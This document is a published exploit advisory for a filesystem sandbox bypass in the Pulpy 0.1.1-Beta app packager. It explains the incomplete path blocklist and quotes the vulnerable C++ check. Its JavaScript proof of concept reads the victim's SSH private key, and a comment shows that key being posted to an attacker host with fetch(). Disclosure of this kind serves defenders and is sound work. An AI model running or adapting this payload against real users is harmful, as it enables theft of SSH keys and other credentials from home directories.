Pulpy 0.1.1-Beta Exploit, Filesystem Sandbox Bypass

# Exploit Title: Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass
# Google Dork: N/A
# Date: 2026-06-19
# Exploit Author: Onur BILICI @basekill
# Vendor Homepage: https://github.com/enesgkky/pulpy
# Software Link: https://github.com/enesgkky/pulpy
# Version: <= 0.1.1-Beta
# Tested on: macOS, Linux
# CVE: CVE-2026-44225

Description:
  Pulpy injects a 'pulpy.fs' JavaScript API into every packaged web application,
  granting it access to the host filesystem. A 'validateFsPath()' function is
  implemented to sandbox this access using a blocklist. However, this blocklist
  is incomplete.

  The implementation only catches root-level paths (e.g., matching "/Library/"
  at index 0), meaning it completely misses user-specific paths such as
  "/Users/<username>/Library/" or critical configuration directories like
  "~/.ssh/", "~/.aws/", and "~/Documents/".

  As a result, any malicious web application packaged with Pulpy can bypass the
  sandbox to read and write arbitrary sensitive files in the user's home directory.

Root Cause Analysis:
  In 'src/bridge/native_modules.mm', the path validation logic relies on a weak
  prefix check:

  std::string normalized = fs::weakly_canonical(p).string();
  if (normalized.find("/etc/") == 0 ||
      normalized.find("/var/") == 0 ||
      normalized.find("/usr/") == 0 ||
      normalized.find("/System/") == 0 ||
      normalized.find("/Library/") == 0) {
      return "";
  }
  return normalized;

Proof of Concept (PoC):
  An attacker can execute the following JavaScript code within a Pulpy-packaged
  application to exfiltrate sensitive user data:

  ```javascript
  // Bypassing the sandbox to read sensitive files from the user's home directory
  try {
      // Example target: SSH private key
      // Note: You need to replace '<username>' with the target's actual username or dynamically resolve it
      const sshKeyPath = "/Users/<username>/.ssh/id_rsa";

      pulpy.fs.readFile(sshKeyPath, 'utf8', (err, data) => {
          if (err) {
              console.error("Failed to read file:", err);
              return;
          }
          console.log("Successfully bypassed sandbox! Content:\n", data);

          // Exfiltration logic can be placed here (e.g., fetch('[https://attacker.com/log](https://attacker.com/log)', {method: 'POST', body: data}))
      });
  } catch (e) {
      console.error("Exploit failed:", e);
  }

All rights reserved nPulse.net 2009 - 2026
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD